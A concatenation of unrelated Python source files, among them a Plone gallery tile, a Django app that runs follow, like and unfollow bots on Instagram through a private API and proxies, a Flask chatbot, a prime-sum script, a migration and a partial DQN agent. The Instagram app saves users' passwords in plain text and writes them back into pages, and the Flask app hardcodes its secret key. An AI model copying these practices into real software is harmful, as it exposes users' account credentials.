recalc()
window.mainloop()
|
# -*- coding: utf-8 -*-
from collective.cover.tiles.base import IPersistentCoverTile
from collective.cover.tiles.base import PersistentCoverTile
from plone.app.uuid.utils import uuidToObject
from plone.memoize import view
from plone.tiles.interfaces import ITileDataManager
from plone.uuid.interfaces import IUUID
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from sc.photogallery import _
from sc.photogallery.utils import PhotoGalleryMixin
from zope import schema
from zope.interface import implementer
class IPhotoGalleryTile(IPersistentCoverTile):
"""A tile that shows a photo gallery."""
uuid = schema.TextLine(
title=_(u'UUID'),
required=False,
readonly=True,
)
@implementer(IPhotoGalleryTile)
class PhotoGalleryTile(PersistentCoverTile, PhotoGalleryMixin):
"""A tile that shows a photo gallery."""
index = ViewPageTemplateFile('photogallery.pt')
is_configurable = True
is_editable = False
is_droppable = True
short_name = _(u'msg_short_name_photogallery', u'Photo Gallery')
def accepted_ct(self):
"""Accept only Photo Gallery objects."""
return ['Photo Gallery']
def populate_with_object(self, obj):
super(PhotoGalleryTile, self).populate_with_object(obj) # check permissions
if obj.portal_type in self.accepted_ct():
uuid = IUUID(obj)
data_mgr = ITileDataManager(self)
data_mgr.set(dict(uuid=uuid))
def is_empty(self):
return (self.data.get('uuid', None) is None or
uuidToObject(self.data.get('uuid')) is None)
@view.memoize
def gallery(self):
return uuidToObject(self.data.get('uuid'))
@view.memoize
def results(self):
gallery = self.gallery()
return gallery.listFolderContents()
def image(self, obj, scale='large'):
"""Return an image scale if the item has an image field.
:param obj: [required]
:type obj: content type object
:param scale: the scale to be used
:type scale: string
"""
scales = obj.restrictedTraverse('@@images')
return scales.scale('image', scale)
|
from django.shortcuts import render,redirect
from .models import *
from aristo.models import *
from payment.models import *
from instagram import functions
from django.contrib.auth.models import User
from django.contrib.auth import login, authenticate, logout
from instagram import private_api
import time
from . import tasks
from datetime import datetime, timezone,timedelta
now = datetime.now(timezone.utc)
from django.contrib.auth.decorators import login_required
from django.core.mail import send_mail
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.core.mail import EmailMessage
from django.template.loader import render_to_string
from django.contrib.sites.shortcuts import get_current_site
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.http import HttpResponse
from instagram import private_api
from instagram_private_api import (Client, ClientError, ClientLoginError,ClientCookieExpiredError, ClientLoginRequiredError, ClientThrottledError,__version__ as client_version)
#Dashboard Views
@login_required(login_url='/login/')
def change_active_account(request,username):
Instagram_Accounts.objects.filter(main_user__username=request.user).update(is_current_account=0)
Instagram_Accounts.objects.filter(username=username).update(is_current_account=1)
return profile(request)
@login_required(login_url='/landing/')
def dashboard(request):
if request.POST:
assistant = Assistants.objects.filter(id=request.POST["assistant"])
if len(assistant) == 0:
pass
else:
assistant = assistant[0]
if request.POST["type"]=="sonlandır":
assistant.activity_status = 3
assistant.update_time = datetime.now(timezone.utc)
assistant.save()
elif request.POST["type"]=="durdur":
assistant.activity_status = 0
assistant.update_time = datetime.now(timezone.utc)
assistant.save()
elif request.POST["type"]=="devam_et":
assistant.activity_status = 1
assistant.update_time = datetime.now(timezone.utc)
assistant.save()
elif request.POST["type"]=="başlat":
return redirect("/select_assistant/")
all_new_ffs = functions.new_actions(request.user)
ig_accounts_list= functions.get_linked_accounts(request.user)
linked_assistants_list=functions.linked_assistants(request.user)
new_linked_assistants_list = []
for i in linked_assistants_list:
deneme = []
for b in i:
deneme.append(b)
new_linked_assistants_list.append(deneme)
a = 0
ohow = []
for i in new_linked_assistants_list:
if len(i) == 2:
ohow.append(i)
else:
if a == 0:
i.append("x")
ohow.insert(0,i)
a += 1
elif a == 1:
i.append("y")
ohow.insert(1,i)
a += 1
elif a == 2:
ohow.insert(2,i)
i.append("z")
a += 1
elif a == 3:
ohow.insert(3,i)
i.append("ogg")
follow_actions = Follow_Actions.objects.filter(instagram_account__main_user__username = request.user,status = 1)
like_actions = Like_Actions.objects.filter(instagram_account__main_user__username = request.user,status = 1)
comment_actions = Comment_Actions.objects.filter(instagram_account__main_user__username = request.user,status = 1)
unfollow_actions = Unfollow_Actions.objects.filter(instagram_account__main_user__username = request.user,status = 1)
total_actions = []
for i in follow_actions:
total_actions.append(i)
for i in like_actions:
total_actions.append(i)
for i in comment_actions:
total_actions.append(i)
for i in unfollow_actions:
total_actions.append(i)
total_actions_return = 0
for i in total_actions:
analyse_ffs = Analyse_FF.objects.filter(instagram_account__main_user__username = request.user,ig_user = i.ig_user,is_follower = 1)
if len(analyse_ffs) == 0:
pass
else:
total_actions_return +=1
try:
percentage_of_actions_return = round((total_actions_return/len(total_actions)*100))
except:
percentage_of_actions_return = 1
total_actions = ["x"]
return render(request, "dashboard.html",{"ig_accounts":ig_accounts_list,"linked_assistants":ohow,"all_new_ffs":all_new_ffs,"percentage_of_actions_return":percentage_of_actions_return,"total_actions":len(total_actions),"total_actions_return":total_actions_return})
@login_required(login_url='/login/')
def add_insta_account(request):
if request.POST:
ig_accounts_list=functions.get_linked_accounts(request.user)
user = User.objects.get(username = request.user)
check_license = License.objects.filter(main_user__username = request.user)[0]
account_limit = check_license.package.account_count
all_proxies = SocinstaProxy.objects.filter()
if user.is_active == False:
return render(request,"profile.html",{"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error(' Lütfen hesap eklemek için mailinizden hesabınızı onaylayın')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
elif account_limit == 0:
return render(request,"profile.html",{"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Lütfen hesap eklemek için lisans sürümünüzü yükseltin')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
elif len(ig_accounts_list)>=account_limit:
return render(request,"profile.html",{"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Hesap ekleme limitine ulaştınız , daha fazla hesap eklemek için paketinizi yükseltebilirsiniz.')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
username=request.POST["instagram_username"]
password=request.POST["instagram_password"]
selected_proxy_id = request.POST['selected_proxy_id']
current_proxy = SocinstaProxy.objects.filter(id=selected_proxy_id)
challenge_user = Challenge_User.objects.filter(username = username)
if len(challenge_user) == 0:
challenge_user = Challenge_User(username = username,main_user=request.user,password = password)
challenge_user.save()
challenge_user = Challenge_User.objects.filter(username = username)[0]
if challenge_user.sms_or_mail == 2:
challenge_required_mail = request.POST.get("mail")
challenge_required_sms = request.POST.get("sms")
if challenge_required_sms == "on":
sms_or_mail = 0
challenge_user.sms_or_mail = sms_or_mail
else:
if challenge_required_mail == "on":
sms_or_mail = 1
challenge_user.sms_or_mail = sms_or_mail
else:
pass
else:
pass
challenge_user.save()
challenge_user = Challenge_User.objects.filter(username = username)[0]
challenge_code = request.POST["challenge_code"]
if challenge_code == "0":
challenge_user.delete()
check_linked_assistants_list=functions.check_linked_assistans(request.user)
return render(request,"profile.html",{"wow":"none","wow2":"block","challenge_code":"none","user":request.user,"ig_accounts":ig_accounts_list,"assistants_list":check_linked_assistants_list,"license_data":functions.license_data(request.user),"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none"})
elif challenge_code == "":
challenge_code = 2
else:
challenge_user.challenge_code = challenge_code
challenge_user.save()
control_instagram_user=Instagram_Accounts.objects.filter(username=username)
if len(control_instagram_user)==0:
challenge_code = challenge_user.challenge_code
sms_or_mail = challenge_user.sms_or_mail
challenge_user.save()
#check_is_real Authentication da hatası verebilir.
check_user=private_api.check_is_real(request.user,username,password,challenge_code = challenge_code,sms_or_mail = sms_or_mail,proxy_id=selected_proxy_id)
if check_user == None:
check_user = 11
if type(check_user) != int:
api = check_user
rank_token = Client.generate_uuid()
try:
info = api.username_info(username)
except:
challenge_user.delete()
return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Çok fazla deneme yaptınız, lütfen daha sonra yeniden deneyiniz.')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
follower_count = info.get("user").get("follower_count")
following_count = info.get("user").get("following_count")
post_count = info.get("user").get("media_count")
profile_pic_url = info.get("user").get("profile_pic_url")
user_pk = info.get("user").get("pk")
full_name = info.get("user").get("full_name")
is_private = info.get("user").get("is_private")
biography = info.get("user").get("biography")
is_business = info.get("user").get("is_business")
Instagram_Accounts.objects.filter(main_user=request.user).update(is_current_account=0)
New_IG_Account=Instagram_Accounts(main_user=request.user,username=username,password=password,is_current_account=1,user_pk=user_pk,
full_name = full_name,is_private=is_private,
biography = biography,is_business = is_business,profile_pic_url = profile_pic_url,current_proxy=current_proxy[0])
New_IG_Account.save()
private_api.create_cookie(api.settings, username, rank_token)
new_ig_analyse=Instagram_Accounts_Analyse(instagram_account=New_IG_Account,media_count=post_count,follower_count=follower_count,following_count=following_count)
new_ig_analyse.save()
challenge_user.instagram_account = New_IG_Account
challenge_user.save()
#Celery Part
tasks.analyse_ig_account.apply_async(queue='deneme1',args=[username])
#!!!! return'lar düzenlenecek!
ig_accounts_list=functions.get_linked_accounts(request.user)
return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"none","wow2":"block","challenge_code":"none","pop_up":"add_insta_account_success('Hesap başarıyla eklendi')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
#Hesap eklerken lazım olacak doğrulama işlerini de bu fonksiyonda halledelim.
elif check_user == 1:
challenge_user.delete()
return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Böyle bir kullanıcı bulunamadı.')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
elif check_user == 2:
challenge_user.delete()
return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Yanlış şifre!')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
elif check_user == 3:
return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Lütfen 1 saat bekleyip yeniden deneyin!')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
elif check_user == 4:
return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Lütfen instagrama girerek gerçekleştiren eylemi ben yaptım seçeneğini işaretleyiniz')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
elif check_user == 5:
return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"block","pop_up":"add_insta_account_error('Lütfen telefonunza yada mailinize gelin kodu doğru bir şekilde giriniz!')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"none","ig_username_disabled":"block","sms_or_mail":"none","ig_user":username,"ig_user_password":password,"license_data":functions.license_data(request.user)})
elif check_user == 6:
return render(request,"profile.html",{"current_proxy":current_proxy,"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Lütfen hesabınızı onaylama yönteminiz seçiniz!')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"none","ig_username_disabled":"block","sms_or_mail":"block","ig_user":username,"ig_user_password":password,"license_data":functions.license_data(request.user)})
elif check_user == 7:
return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"block","pop_up":"add_insta_account_error('Bilinmeyen hata')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
elif check_user == 8:
return render(request,"profile.html",{"current_proxy":current_proxy,"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"block","pop_up":"add_insta_account_error('Lütfen gelen kodu giriniz eğer kod gelmediyse(5dk ya kadar kod gelmesi gecikebilir) yada yanlış onay çeşidini seçtiyseniz onay kodu yerine 0 yazıp onaylayın ve daha sonra yeniden deneyin')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"none","ig_username_disabled":"block","sms_or_mail":"none","ig_user":username,"ig_user_password":password,"license_data":functions.license_data(request.user)})
elif check_user == 9:
challenge_user.delete()
return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Lütfen farklı bir onay yöntemi deneyiniz.')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"none","ig_username_disabled":"block","sms_or_mail":"block","ig_user":username,"ig_user_password":password,"license_data":functions.license_data(request.user)})
elif check_user == 10:
challenge_user.delete()
return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Lütfen boş yerleri doldurun.')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
elif check_user == 11:
challenge_user.delete()
return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Çok fazla deneme yaptınız, lütfen daha sonra yeniden deneyiniz.')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
else:
return render(request,"profile.html",{"wow":"block","challenge_code":"none","wow2":"none","pop_up":"add_insta_account_error('Bu hesap zaten kayıtlı')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
else:
ig_accounts_list=functions.get_linked_accounts(request.user)
return render(request,"profile.html",{"wow":"none","wow2":"block","challenge_code":"none","pop_up":"add_insta_account_success('Hesap başarıyla eklendi')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
@login_required(login_url='/login/')
def profile(request):
instagram_accounts=functions.get_linked_accounts(request.user)
check_linked_assistants_list=functions.check_linked_assistans(request.user)
if len(SocinstaProxy.objects.all()) == 0:
new_proxy = SocinstaProxy(created_date=datetime.now(timezone.utc))
new_proxy.save()
all_proxies = SocinstaProxy.objects.all()
try:
license_datas = functions.license_data(request.user)
except:
license_datas = 0
return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"none","wow2":"block","challenge_code":"none","user":request.user,"ig_accounts":instagram_accounts,"number":len(instagram_accounts),"assistants_list":check_linked_assistants_list,"license_data":license_datas,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none"})
#Asssistant Views
@login_required(login_url='/login/')
def select_assistant(request):
ig_accounts_list=functions.get_linked_accounts(request.user)
if request.POST:
license_object = License.objects.filter(main_user__username = request.user)[0]
if license_object.status == 2:
return render(request,"assistant_type.html",{"ig_accounts":ig_accounts_list,"popup_message":"license_has_expired()"})
if 'source' in request.POST:
filters_html = str(request.POST['type']) + '_' + str(request.POST['source']) + '.html'
return render(request,filters_html,{"ig_accounts":ig_accounts_list})
elif 'type' in request.POST:
instagram_account = Instagram_Accounts.objects.filter(main_user__username = request.user,is_current_account = 1)
if len(instagram_account)==0:
return render(request,"assistant_type.html",{"ig_accounts":ig_accounts_list,"popup_message":"ig_user_was_not_added()"})
else:
instagram_account = instagram_account[0]
assistants = Assistants.objects.filter(instagram_account = instagram_account)
follow_action = 0
like_action = 0
comment_action = 0
for i in assistants:
if i.assistant_type == 0:
if i.activity_status == 0 or i.activity_status == 1:
follow_action = 1
if i.assistant_type == 1:
if i.activity_status == 0 or i.activity_status == 1:
like_action = 1
if i.assistant_type == 2:
if i.activity_status == 0 or i.activity_status == 1:
comment_action = 1
if request.POST['type'] == "follow" and follow_action == 0 or request.POST['type'] == "like" and like_action == 0 or request.POST['type'] == "comment" and comment_action == 0:
return render(request,"assistant_source.html",{"type":str(request.POST['type']),"ig_accounts":ig_accounts_list})
else:
return render(request,"assistant_type.html",{"ig_accounts":ig_accounts_list,"popup_message":"assistant_already_added()"})
else:
return render(request,"assistant_type.html",{"ig_accounts":ig_accounts_list})
@login_required(login_url='/login/')
def delete_ig_account(request):
if request.POST:
ig_account=Instagram_Accounts.objects.get(username=request.POST["ig_account"])
if ig_account.is_current_account==1:
ig_account.delete()
try:
new_active_account=Instagram_Accounts.objects.filter(main_user__username=request.user)[0]
new_active_account.is_current_account=1
new_active_account.save()
except:
pass
else:
ig_account.delete()
return profile(request)
else:
return profile(request)
@login_required(login_url='/login/')
def delete_ig_account_navbar(request,user):
ig_account=Instagram_Accounts.objects.get(username=user)
if ig_account.is_current_account==1:
ig_account.delete()
try:
new_active_account=Instagram_Accounts.objects.filter(main_user__username=request.user)[0]
new_active_account.is_current_account=1
new_active_account.save()
except:
pass
else:
ig_account.delete()
return profile(request)
@login_required(login_url='/login/')
def assistants_details(request):
ig_accounts_list= functions.get_linked_accounts(request.user)
all_actions_list = []
active_ig_account = Instagram_Accounts.objects.filter(main_user__username = request.user,is_current_account = 1)
if len(active_ig_account) == 0:
active_ig_account = 0
else:
active_ig_account = active_ig_account[0]
like_actions = Like_Actions.objects.filter(instagram_account=active_ig_account)
follow_actions = Follow_Actions.objects.filter(instagram_account=active_ig_account)
comment_actions = Comment_Actions.objects.filter(instagram_account=active_ig_account)
unfollow_actions = Unfollow_Actions.objects.filter(instagram_account=active_ig_account)
for i in like_actions:
all_actions_list.append(i)
for i in follow_actions:
all_actions_list.append(i)
for i in comment_actions:
all_actions_list.append(i)
for i in unfollow_actions:
all_actions_list.append(i)
actions_dict = {}
general_actions_list = []
source = ""
relationship = ""
assistant = ""
status = ""
total_actions = len(all_actions_list)
def myFunc(e):
return e.update_time
all_actions_list = sorted(all_actions_list,key=myFunc,reverse=True)
if request.POST:
pass
else:
if total_actions >= 300:
all_actions_list = all_actions_list[:300]
for i in all_actions_list:
actions_dict["Kullanıcı adı"] = i.ig_user.username
actions_dict["Bağlı olduğu hesap"] = i.instagram_account.username
if i.relationship == 0:
relationship = "Takipçileri"
elif i.relationship == 1:
relationship = "Takip ettikleri"
elif i.relationship == 2:
relationship = "Beğenenler"
elif i.relationship == 3:
relationship = "Yorum yapanlar"
else:
relationship = "Takip edilenler"
actions_dict["Kaynak Çeşidi"] = relationship
if i.source_type == 0:
source = "Kullanıcı"
elif i.source_type == 1:
source = "Hashtag"
elif i.source_type == 2:
source = "Lokasyon"
else:
source = "Takip edilenler"
actions_dict["Kaynak Türü"] = source
actions_dict["Geldiği Kaynak"] = i.source
if i.assistant.assistant_type == 0:
assistant = "Takip"
elif i.assistant.assistant_type == 1:
assistant = "Beğeni"
elif i.assistant.assistant_type == 2:
assistant = "Yorum"
elif i.assistant.assistant_type == 3:
assistant = "Takipten Çıkma"
actions_dict["Eylem Türü"] = assistant
if i.status == 0:
status = "Beklemede"
elif i.status == 1:
status = "Başarılı"
elif i.status == 2:
status = "Başarısız"
elif i.status == 9:
status = "Filtreden Geçti"
elif i.status == -1:
status = "Filtreye Takıldı"
actions_dict["Status"] = status
time = i.update_time
time_minute = str(time.minute)
if len(time_minute) == 1:
time_minute = "0"+time_minute
action_time = str(time.year)+"/"+str(time.month)
if time.hour+3 < 24:
new_hour = str(time.hour+3)
new_day = str(time.day)
else:
new_hour = str((time.hour+3)%24)
new_day = str(time.day+1)
if len(new_hour)==1:
new_hour = "0"+new_hour
action_time += "/" + new_day + "/" + new_hour+":"+time_minute
actions_dict["İşlem Zamanı"] = action_time
actions_dict["Deneme"] = "✅"
new_action = []
for i in actions_dict:
new_action.append(actions_dict[i])
general_actions_list.append(new_action)
actions_dict = {}
return render(request,"assistants_details.html",{"general_actions_list":general_actions_list,"ig_accounts":ig_accounts_list,"total_actions":total_actions})
@login_required(login_url='/login/')
def create_assistant(request):
instagram_account = Instagram_Accounts.objects.get(main_user__username = request.user,is_current_account=1)
ig_accounts_list = functions.get_linked_accounts(request.user)
post = request.POST.copy()
#Turn On and None status to 0 and 1
for i in post:
if post.get(i) =='on':
post[i] = 1
check_values=["likers","commenters","is_default","is_private","biography","has_anonymous_profile_picture","is_business","followers","followings","posters","comment"]
for i in check_values:
if i in post:
pass
else:
post[i]=0
#Get All Post Data
likers = post.get("likers")
commenters = post.get("commenters")
is_default = post.get("is_default")
number_of_actions=post.get("number_of_actions")
max_followers=post.get('max_followers')
min_followers=post.get('min_followers')
max_followings=post.get('max_followings')
min_followings=post.get('min_followings')
max_posts=post.get('max_posts')
min_posts=post.get('min_posts')
is_private=post.get("is_private")
biography=post.get("biography")
has_anonymous_profile_picture=post.get("has_anonymous_profile_picture")
is_business=post.get("is_business")
followers = post.get('followers')
followings = post.get('followings')
username = post.get('user')
hashtag = post.get('hashtag')
location = post.get("location")
posters = post.get("posters")
speed = post.get("speed")
comment = post.get("comment")
assistant_type = post.get("type").split('_')[0]
source = post.get("type").split('_')[1]
if username:
private_api.check_sources(instagram_account.username,username,source)
elif hashtag:
private_api.check_sources(instagram_account.username,hashtag,source)
else:
private_api.check_sources(instagram_account.username,location,source)
if assistant_type =='follow':
assistant_type = 0
action_name = Follow_Actions
elif assistant_type =='like':
assistant_type = 1
action_name = Like_Actions
elif assistant_type =='comment':
assistant_type = 2
action_name = Comment_Actions
if source == "user":
source_type = 0
source = username
elif source == "hashtag":
source_type = 1
source = hashtag
elif source == "location":
source_type = 2
source = location
relationship = ''
if followers ==1:
relationship = relationship + '0'
if followings ==1:
relationship = relationship + '1'
if likers ==1:
relationship = relationship + '2'
if commenters ==1:
relationship = relationship + '3'
if posters ==1:
relationship = relationship + '4'
if relationship == '':
return render(request,"assistant_type.html",{"ig_accounts":ig_accounts_list,"popup_message":"relationship_error('Lütfen kaynak seçini yapın!')"})
#Create a new assistant
assistant = Assistants(instagram_account = instagram_account,assistant_type=assistant_type, source_type=source_type,source=source,relationship=relationship,number_of_actions = number_of_actions,activity_status=1,queue=int(relationship[0]),update_time = datetime.now(timezone.utc),comment = comment)
assistant.save()
#Create new assistant's settings
if assistant_type != 0:
assistant_settings=Assistants_Settings(is_default =is_default,assistant=assistant,min_followers=min_followers,max_followers=max_followers,min_followings=min_followings,max_followings=max_followings,is_private=0,biography=biography,is_business=is_business,max_posts=max_posts,min_posts=min_posts,has_anonymous_profile_picture=has_anonymous_profile_picture,speed=speed)
else:
assistant_settings=Assistants_Settings(is_default =is_default,assistant=assistant,min_followers=min_followers,max_followers=max_followers,min_followings=min_followings,max_followings=max_followings,is_private=is_private,biography=biography,is_business=is_business,max_posts=max_posts,min_posts=min_posts,has_anonymous_profile_picture=has_anonymous_profile_picture,speed=speed)
assistant_settings.save()
for i in relationship:
actions = action_name.objects.filter(status = 0,relationship = int(i),source_type = source_type,source = source,assistant__activity_status = 3)
for b in actions:
assistant.queue = b.assistant.queue
assistant.save()
b.assistant = assistant
b.instagram_account = instagram_account
b.save()
return redirect("/dashboard/")
@login_required(login_url='/login/')
def unfollow(request):
ig_accounts_list = functions.get_linked_accounts(request.user)
active_ig_account = Instagram_Accounts.objects.filter(is_current_account=1,main_user = request.user)
if len(active_ig_account) == 0:
return render(request,"assistant_type.html",{"ig_accounts":ig_accounts_list,"popup_message":"relationship_error('Devam etmek için hesap ekleyin!')"})
else:
active_ig_account = active_ig_account[0]
ig_account_analyse = Instagram_Accounts_Analyse.objects.filter(instagram_account=active_ig_account)[0]
if request.POST:
post = request.POST.copy()
noa = post.get('number_of_actions')
noa = int(noa)
is_default = post.get("is_default")
speed = post.get('speed')
unfollow_assistant = Assistants(instagram_account=active_ig_account,number_of_actions = noa,activity_status= 1,update_time = datetime.now(timezone.utc),assistant_type=3,source=active_ig_account.username)
unfollow_assistant.save()
unfollow_assistant_settings = Assistants_Settings(assistant=unfollow_assistant,speed=speed)
unfollow_assistant_settings.save()
if is_default == None:
white_list = request.FILES
if white_list:
white_list = white_list['white_list']
white_list_users = []
for i in white_list:
x = i.decode().strip("\n").strip(",\r").strip(" ")
white_list_users.append(x)
tasks.create_white_list_users.apply_async(queue='deneme1',args=[request.user.username,unfollow_assistant.id,white_list_users])
else:
pass
else:
white_list_assistant = White_List_Assistant.objects.filter(instagram_account=active_ig_account)
if len(white_list_assistant) == 0:
tasks.create_white_list_users.apply_async(queue='deneme1',args=[request.user.username, unfollow_assistant.id])
return redirect("/dashboard/")
else:
unfollow_assistant = Assistants.objects.filter(instagram_account=active_ig_account,assistant_type=3,activity_status=1)
unfollow_assistant2 = Assistants.objects.filter(instagram_account=active_ig_account,assistant_type=3,activity_status=9)
if len(unfollow_assistant) + len(unfollow_assistant2) == 0:
return render(request,"unfollow.html",{"ig_accounts":ig_accounts_list})
else:
return render(request,"assistant_type.html",{"ig_accounts":ig_accounts_list,"popup_message":"relationship_error('Asistan zaten aktif!')"})
|
import gevent.monkey
gevent.monkey.patch_all()
from flask import Flask, render_template, request, redirect
from flask_socketio import SocketIO
import sqlite3
from chatterbot import ChatBot
#
bot = ChatBot(
'Terminal',
storage_adapter='chatterbot.storage.SQLStorageAdapter',
logic_adapters=[
{
'import_path': 'chatterbot.logic.BestMatch',
'default_response': 'Sorry, I do not understand',
'maximum_similarity_threshold': 0.8
},
{
'import_path': 'chatterbot.logic.BestMatch',
}
# 'chatterbot.logic.TimeLogicAdapter',
],
read_only=True,
database_uri='sqlite:///Data.db')
app = Flask(__name__)
app.config['SECRET_KEY'] = 'chatbotbeepboop'
socketio = SocketIO(app)
#default page
@app.route("/")
def sessions():
return render_template("index.html");
#msg received
def messageReceived(methods=['GET', 'POST']):
print('message was received!!!')
@socketio.on('my event')
def handle_my_custom_event(text, methods=['GET', 'POST']):
print('received my events_test: ' + str(text))
server_inp = text['message']
ans_get = bot.get_response(server_inp)
print(ans_get)
#socketio.emit('my response', ans_get, callback=messageReceived);
#socketio.emit('my response', text, callback=messageReceived)
socketio.emit('my response', {'question': server_inp, 'message': str(ans_get)})
engine.say(str(ans_get))
#submit chat
@app.route('/submit', methods = ['POST'])
def submit():
text_data = request.form['message']
print("The text is '" + text_data + "'")
return redirect('/');
# Uncomment the following lines to enable verbose logging
# import logging
# logging.basicConfig(level=logging.INFO)
# Create a new instance of a ChatBot
if __name__ == "__main__":
socketio.run(app, debug=True) |
from django.contrib import admin
from django.urls import path, include
from rest_framework.routers import DefaultRouter
from polls.views import PollViewSet
router = DefaultRouter()
router.register('polls', PollViewSet, basename='polls')
urlpatterns = [
path('admin/', admin.site.urls),
path('api/', include(router.urls))
]
|
import math
limit = 50*10**6
primes = []
not_primes = set([0, 1])
# Crible d'Erathostene : on remplit primes (en utilisant not_primes)
print "Loading of the primes until", limit
for head in range(2, int(math.sqrt(limit)) + 1):
if head not in not_primes:
primes.append(head)
i = 2
next_not_prime = i * head
while next_not_prime <= limit:
not_primes.add(next_not_prime)
i += 1
next_not_prime = i * head
print "Primes loaded\n"
sums = set()
count = 0
for a in range(int(math.sqrt(limit)) + 1):
if a in primes:
count += 1
if count % 1000 == 0:
print a
a2 = a**2
for b in range(int(math.pow(limit - a2, 1./3)) + 1):
if b in primes:
b3 = b**3
for c in range(int(math.pow(limit - a2 - b3, 1./4)) + 1):
if c in primes:
sums.add(a2 + b3 + c**4)
print len(sums), list(sums)[-10:]
print len([i for i in sums if i <= limit])
|
# Generated by Django 3.0.3 on 2020-02-08 11:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('facts', '0003_auto_20200208_1221'),
]
operations = [
migrations.AlterField(
model_name='artist',
name='artist',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='facts',
name='author',
field=models.CharField(default='none', max_length=100),
),
migrations.AlterField(
model_name='facts',
name='facts',
field=models.TextField(),
),
migrations.AlterField(
model_name='song',
name='id',
field=models.AutoField(primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='song',
name='song',
field=models.CharField(max_length=100),
),
]
|
# -*- coding: utf-8 -*-
"""
Deep Q-network implementation with chainer and rlglue
Copyright (c) 2015 Naoto Yoshida All Right Reserved.
"""
import copy
import pickle
import numpy as np
import cv2
import scipy.misc as spm
import sys
import matplotlib
import matplotlib.pyplot as plt
from chainer import cuda, FunctionSet, Variable, optimizers
import chainer.functions as F
from rlglue.agent.Agent import Agent
from rlglue.agent import AgentLoader as AgentLoader
from rlglue.types import Action
from surface_indices import *
#from dqn_agent_nature import DQN_class
class dqn_agent(Agent): # RL-glue Process
lastAction = Action()
policyFrozen = False
cnt = 0
def agent_init(self, taskSpec):
# Some initializations for rlglue
self.lastAction = Action()
self.time = 0
self.epsilon = 1.0 # Initial exploratoin rate
# Pick a DQN from DQN_class
#self.DQN = DQN_class() # Default is for "Pong".
print 'agent_init done'
def agent_start(self, observation):
returnAction = Action()
returnAction.intArray = [-1]
return returnAction
def agent_step(self, reward, observation):
# Observation display
returnAction = Action()
actNum = -1
#if self.cnt % 100 < 5:
# actNum = (self.cnt // 100) % 9
img = np.zeros((17,17), dtype=np.float32)
for i, v in enumerate(observation.doubleArray[:17*17]):
img[surface_indices[i]] = v
img = (img + 90.0) / 130.0
img = cv2.resize(img, (128, 128))
cv2.imshow('observation',img)
k = cv2.waitKey(0)
